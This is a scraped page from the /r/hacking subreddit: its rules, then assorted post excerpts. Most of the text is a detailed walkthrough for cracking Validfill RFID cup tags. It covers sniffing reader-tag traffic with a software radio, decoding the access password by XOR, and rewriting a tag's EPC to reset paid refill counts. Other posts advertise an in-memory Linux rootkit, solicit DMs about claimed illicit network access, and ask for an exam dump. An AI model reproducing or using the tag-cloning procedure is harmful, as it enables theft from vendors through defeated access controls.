/r/hacking
A subreddit dedicated to hacking and hackers.
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology, sharing ideas and suggestions for small business and personal security.
A subreddit dedicated to hacking and hacking culture.
What we are about: quality and constructive discussion about the culture, profession and love of hacking.
This sub is aimed at those with an understanding of hacking - please visit /r/HowToHack for posting beginner links and tutorials; any beginner questions should be directed there as they will result in a ban here.
Guides and tutorials are welcome here as long as they are suitably complex and most importantly legal!
Bans are handed out at moderator discretion.
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
Keep it legal Hacking can be a grey area but keep it above board. Discussion around the legality of issues is ok, encouraging or aiding illegal activities is not
We are not your personal army. This is not the place to try to find hackers to do your dirty work and you will be banned for trying. This includes:
No "how do i start hacking?" posts. See /r/howtohack or the stickied post. Intermediate questions are welcomed - e.g. "How does HSTS prevent SSL stripping?" is a good question. "How do I hack wifi with Kali?" is bad.
No "I got hacked" posts unless it's an interesting post-mortem of a unique attack. Your nan being phished doesn't count.
Sharing of personal data is forbidden - no doxxing or IP dumping
Spam is strictly forbidden and will result in a ban. Professional promotion e.g. from security firms/pen testing companies is allowed within the confines of site-wide rules on self promotion found here, but will otherwise be considered spam.
Off-topic posts will be treated as spam.
Low-effort content will be removed at moderator discretion
We are not tech support, these posts should be kept on /r/techsupport
Don't be a dick. Play nice, support each other and encourage learning.
/r/hacking
I Heard of this type protocol and Im thinking:
Basically the title.
Essentially someone who didn’t have malicious intent but they ended up doing more damage than good
I think it’s safe to say that nobody really likes RFID drink control. Looking online you’ll find countless Reddit posts or articles complaining about how Disney or Universal or their University is using RFID enabled drinkware to limit refills. Many people have speculated on how to defeat it. Some tried using their Flipper but to no avail, some claimed the data was stored off tag, on a server, and some even said it was impossible. In fact, I can find no evidence online that anybody has ever successfully hacked a Validfill tag. Well I’m here to tell you most of those people are wrong. It is possible, but it’s a lot harder than you might think.
Also feel free to ask any questions.
Readings
The second page of the Practical Eavesdropping of control data from EPC Gen2 article, figure 1 and the associated reading provides a great diagram and explanation of the EPC c1g2 protocol.
The official standard for the EPC c1g2 protocol gives very important info on reader and tag signal encoding in sections 6.3.1.2 and 6.3.1.3 as well as command structure which is covered in section 6.3.2.11.3.
Equipment
An EPC c1g2 compliant UHF reader like this PISwords ISO18000 reader from AliExpress. This will allow us to read and write to the tag.
A cheap software defined radio such as the RTL-SDR from Amazon as well as a 902MHz to 927MHz antenna. This will allow us to eavesdrop on tag communication. Also recommended would be a USB extension cable so that you can freely move the radio.
Software
The PISwords reader comes with a demo program that we will use to read and write to the tag. The program is called UHFReader09demomain.exe can be found at “\Piswordsuhfreadernew\Piswordsuhfreader\USBreaderSoftware\Demo\C#\UHFReader09demomain\bin\x86\Debug”
We will be using Osmocom in conjunction with the RTL-SDR to capture and record reader and tag communication.
We will also be using the Inspectrum tool to analyze the resulting file and convert the FFT graph into an amplitude graph.
Signal decoding can be done visually using a drawing app such as tldraw we’ll use to block out each of the bits.
Gathering Data
The first step in getting quality data is assembling the ideal setup. From testing I found that positioning the SDR’s antenna directly in the middle of the tag’s coil and parallel to the slit. Additionally, testing showed that the tag should be in direct contact with the reader on the Freestyle machine. Testing also showed that the Freestyle machine also seems to have a sensor for the bottle itself in addition to the tag so a bottle should be placed on top of the setup when scanning. You should leave the tag on the reader for at least 20-30 seconds to give you more data to choose from.
Using Osmocom, set the center frequency around 910MHz - 915MHz, testing showed this range was able to receive enough transmissions regardless of frequency hopping. Also, set the sample rate to the max, in my case, 2.55MHz. The higher the sample rate, the greater the bandwidth, and the more likely you are to receive a transmission.
Using Inspectrum, import the file that Osmocom made. Set the zoom slider to min and drag the FFT size slider until it fills most of the screen. Leave the power max slider at max and adjust the power min slider until the background of the display is a dark blue. Start scrolling until you find a bright bar, that’s a transmission.
Right click on the transmission you want and select the derived plot and then add amplitude plot.
Ensure the center of the range is centered on the center of the transmission.
Lower the power max until the amplitude graph shows blocks. You should see blocks throughout the entire transmission and there should be “low” (reader) and “high” (tag) blocks.
The “low” and “high” blocks are also visible from the FFT display making it easier to find quality transmissions.
Quality transmission, visible from FFT as well
Using the chart in “Practical Eavesdropping” we can block out each packet in the transmission. The packets we care about are RN16', Access(PIN 31:16 ⊕ RN16'), RN16'', and Access(PIN 15:0 ⊕ RN16'')
The password needed to write to the tags has its 16 most significant bits sent right after the RN16' packet and is encrypted by PIN 31:16 ⊕ RN16' which is a bitwise XOR on the two numbers. The first step should be to record and decode the tag’s response to the Req_RN commands which should provide us with both RN16' and RN16''. Then we should record and decode the reader’s Access commands from which we can extract the encrypted PIN 31:16 ⊕ RN16' and PIN 15:0 ⊕ RN16''. We can then get the original password by performing a bitwise XOR over the encrypted password. This is because the bitwise XOR operator “cancels out” if applied twice.
Analyzing the Tag’s Response
To decode an RN16 packet, start by identifying your packet and setting the zoom slider to max. Adjust the power max slider and the plot range until you can see an alternating signal. The signal should start with symmetric oscillations and then after a while you should see longer peaks or troughs.
Using the information in the official EPC standard, section 6.3.1.3, we can determine that the tag is using Miller-modulated subcarrier with M = 4 and a RText = 1 preamble. “0”s are encoded by 4 equal high or low pulses while “1”s are encoded by 3 high or low pulses, the center pulse being twice as long.
Miller-modulated encoding, blocked out preamble
The rest of the signal can be blocked out in a similar way using the sequence chart as a guide. The Miller protocol also calls for a dummy “1” bit at the end of the packet.
Because the packet we just decoded is an RN16, the previous command should have been Req_RN. We can look this up in section 6.3.2.11.3 to find the data structure of the packet. We see that the tag’s response defines the first 16 bits of the message as the RN16. These bits are important and should be set aside for now.
Tag reply format, first half of packet
This process should be done once for RN16' and should be repeated for RN16''.
Analyzing the Reader’s Response
To decode an Access packet, start by identifying your packet and setting the zoom slider to max or a few ticks before max. Adjust the power max slider and the plot range until you can see an alternating signal. The signal should start with one short pulse, one long pulse, and then continue with a combination of short and medium pulses.
Using the information in the official EPC standard, section 6.3.1.2, we can determine that the reader is using Pulse Interval Encoding (PIE) with an R=>T Frame Sync rather than a preamble.
PIE encoding, Frame Sync and first byte
The rest of the signal can be blocked out in a similar way using the symbol chart as a guide. Short pulses are “0”s and long pulses are “1”s. The PIE protocol does not end with a dummy bit.
Because the packet we just decoded is an Access packet, we can look this up in section 6.3.2.11.3 to find its data structure. We see that the PIN ⊕ RN16 is defined by the 16 bits after the command. These bits are important and should be set aside for the next step.
Reader command format, first half of packet
This process should be done once for PIN 31:16 ⊕ RN16' and should be repeated for PIN 15:0 ⊕ RN16''.
Decoding the Password
To decode PIN 31:16 from PIN 31:16 ⊕ RN16' and RN16', we’ll have to perform a bitwise xor on the two binary numbers.
In our first analysis, we found that RN16' is “11111011 : 10000010”
In our second analysis, we found that PIN 31:16 ⊕ RN16' is “01100000 : 10101111”
To perform a bitwise XOR, for each bit in both numbers, we will compare the two. If they are the same (both “1”s or “0”s) the resulting bit will be “0”. If they are the different (one is “1” and the other “0”) the resulting bit will be “1”.
In this case our resulting PIN 31:16 is “10011011 : 00101101”
We’ll pretend that we calculated PIN 15:0 as “11011010 : 00010011” which means our example password is 10011011001011011101101000010011.
To use this with the reader’s program, we’ll need to convert it to hexadecimal which turns out to be 9B2DDA13.
Reading and Writing to the Tag
Start by opening the PISwords demo program and clicking open port. It may take a few minutes to establish a connection.
Switch to the EPCC1-G2 Test tab and grab a new tag. Click query tag in the upper right corner of the program. Bring the tag near until the reader beeps, you should see the tag’s EPC being written on the list. This string encodes the number of fills on the bottle and should be noted for the next step. Click query tag again and bring the tag that you wish to write to near the reader until it beeps. You should see the tag’s EPC being written on the list. This step sets the target of the reader to the old tag.
Under the Write EPC section on the middle right, paste the EPC from the new tag under the Write EPC field and paste the password we discovered under the Access Password field. While the tag is in range, press the Write EPC button. You should hear a beep and message at the bottom of the program saying “Write EPC Successfully”
The tag will now act identically to the new tag that had been copied from.
Or seems like every week a new organization such as Ticketmaster or Johnson Controls gets breached but we don't see Putin's private investment records or Obama's notes from decisions made during his presidency getting released? These are just random examples but to me it seems like there would be sufficient market for this type of info that someone would go after it.
Is there a significant difference in how these individuals private information is stored compared to major organizations user data? It seems like both could afford the best security available.
I know some linux commands from OverTheWire"ls , cd , cat , file , du , find, grep, sort, uniq, strings, base64" and I wanted to know what linux projects can I do to expand on this for cyber security apart from OverTheWire.
I am a beginner.
Forgive me if this is a stupid question as I've done minimal research and my background is purely in backend development of micro services, but does anyone have any tips on sniffing traffic from a wearable?
I don't have the ring on me yet so I can't try anything yet. I imagine the ring sends information over Bluetooth, has anyone done anything like this that I can get some resources to read up on?
I think it'd be neat to potentially get the raw data myself and see if I can write a wrapper to export the data to better apps since the ring has minimal third party integrations.
Is pwnable.kr good for an absolute beginner?
I am an absolute noob in linux
I am on level Level 6 on Over the Wire and so far I am understanding but I also heard about pwnable.kr so I tried out the first level on [Toddler's Bottle] (fd) and I am at a lost. I so far understand what a file directory is and how to create and remove one but I saw that you need to have an understanding of C for pwnable.kr.
Am I wrong?
I am a beginner in python right now and I tried to use the OS module but realized that the code would be linked to my directory and not the pwnable.kr port which I do not know how to switch over.
Hello community, I am doing research on vulnerabilities in PAN networks focused on Bluetooth technology. I would like to know if any of you know sites or places where I can look for updated information on this.
And based on that, perform tests in controlled environments with open source tools. Thanks, greetings.
Ubertooth is a great device and tool to discover the UAP+LAP. For my needs, I must have the entire BD_ADDR correct. The most common way to find the missing part (NAP) is to bruteforce the OUI list with addresses that ends with the UAP and try to smartly relate to the type of device. That way you minimize the number of potential addresses to check (averaging around 30-40 addresses).
If I try to establish a connection with a wrong address and it falls (which is good) I can try another, but the device will show a notification (that's bad).
So bruteforcing with connection is not the right way. Ping is better.
My problem is that I don't know how to ping an exact address. All the tools are working even if the NAP is wrong (if the UAP+LAP are correct it's enough). Tools like l2ping, hcitool etc. For example, if my device's address is 01:02:03:04:05:06 I can ping to xx:xx:03:04:05:06 (x can be any value) and the ping will still work.
I want to ping and address and receive an answer only if the entire address is correct.
Anyone knows how can I achieve that? Which tool? Maybe a different way?
Hi, I want to learn about Chinese state hacker groups, attacks they did, possibly with technical details. Can you point me anywhere? Thanks
How do nation-state hackers and APTs get so skilled, stealthy and insidious. What separates them from the rest of the hackers. What makes them the creme de la creme of the game?
Someone have a dump from cyberwarfare CRTA?
This is a 2023 remix of the OneRuleToRuleThemAll (2019) hashcat rule.
OneRuleToRuleThemStill now has a ~6.9% reduction in rules (52,000 down to 48,414) with 0% performance loss against the Lifeboat and LastFM data breaches.
Updates:
Happy cracking!
Tons of generic stuff that has no real word application. A cve may score 10 star point, yet there's no showcase of exploitation, making it pointless
Mitreattack it's even worse
Hello everybody, I’ve been kind of looking for direction in life and computers fascinate me. I don’t really know anything about them but can create a mean power point LOL, all jokes aside, I want to learn how to code or hack or just understand what code even is. What and where can I self learn these things? Sorry for the stupid questions.
Hello all,
I am a PhD researcher and my area of research centers around the role of CISOs and the different factors at play around that role, such as poor work-life balance, burnout, lack of recognition in the board, etc.
I am extremely passionate about my projects and rather than writing research papers just for namesake, I want to talk to CISOs, understand their side of things granularly, and then present my findings in a way that can potentially have real world implications for practitioners and businesses.
Unfortunately, I have learnt the hard way that it is very difficult to engage CISOs to invest an hour of their time with me to interview for my study, owing to many justified reasons such as not having enough time due to their workload. And please don't get me wrong, I respect that.
For the past few months, I have been trying to connect with CISOs on LinkedIn for this pursuit, but haven't gotten enough numbers. It has come to a point that my advisor has hinted that I let go of these projects as the CISO population is a tricky one to engage.
I am not willing to give up just yet. The problems CISOs face are worth solving, and while I am unable to compensate you for your time invested in my projects (especially because of lesser than usual support from the department), I am deeply committed to providing actionable recommendations that can help CISOs manage their burnout and their work better.
If you are a CISO and would be open to investing an hour of your time someday with me, I would be deeply appreciative of your help. I have the IRB approvals as well, meaning that no identifiable detail would be made public.
Thank you.
A few years ago I would use a website that had user-submitted, pre-compiled binaries (I know that sounds sketchy), that had hidden phrases within them. The goal was to find the hidden phrases via decompiling, patching, and other methods, then to submit the answer to the site to show that you completed the challenge. I think the challenges each had difficulty ratings (maybe 1-5 or something?).
I can't remember or find this site for the life of me, and I wouldn't be surprised if it no longer exists. Does anyone else remember? If not, is there some nice alternative? Any info is appreciated.
archive.org is one of the greatest websites in the history of the Internet. Why would somebody want to hack it, especially while pointing out how easy it was?
Do you think there's a deeper reason for that or it's just some kid who noticed how easy it would be and went for it because he's no good for anything else?
I’ve been learning a few new techniques and was wondering if anyone has the same hobby and who love to tinker with Kali Linux, Arduino, ESP32, social engineering, and hacking in general !
I was able to get unique access to an interesting network but don’t want to “burn” my access too fast , please DM me !
Well, its been a while since I tried my hand at malware. I call this an in-memory rootkit as it doesn't touch disk, hides from netstat, ps, lsof and history. Some might argue it has no persistence if the device is rebooted, but if you've ever been on a server with 2000 days of uptime, its kind of a pointless to do persistence in those cases. Should be self-explanitory from the README file, but I'll be glad to help anyone with questions. Should work on any x86_64 Linux, but I've only tested it Debian so far. I'd love some feedback if anyone has time.
Okay okay, hear me out. Obviously anything being breached isn’t necessarily a good thing… but considering the breaches haven’t (hopefully) done anything with the data other than hand it over to HIBP, is that such a bad thing?
Just imagine for one moment if an actual awful threat actor breached instead, what would they do with that data? Now Internet Archive can patch whatever vulnerability opened themselves up to this and avoid this case in the future.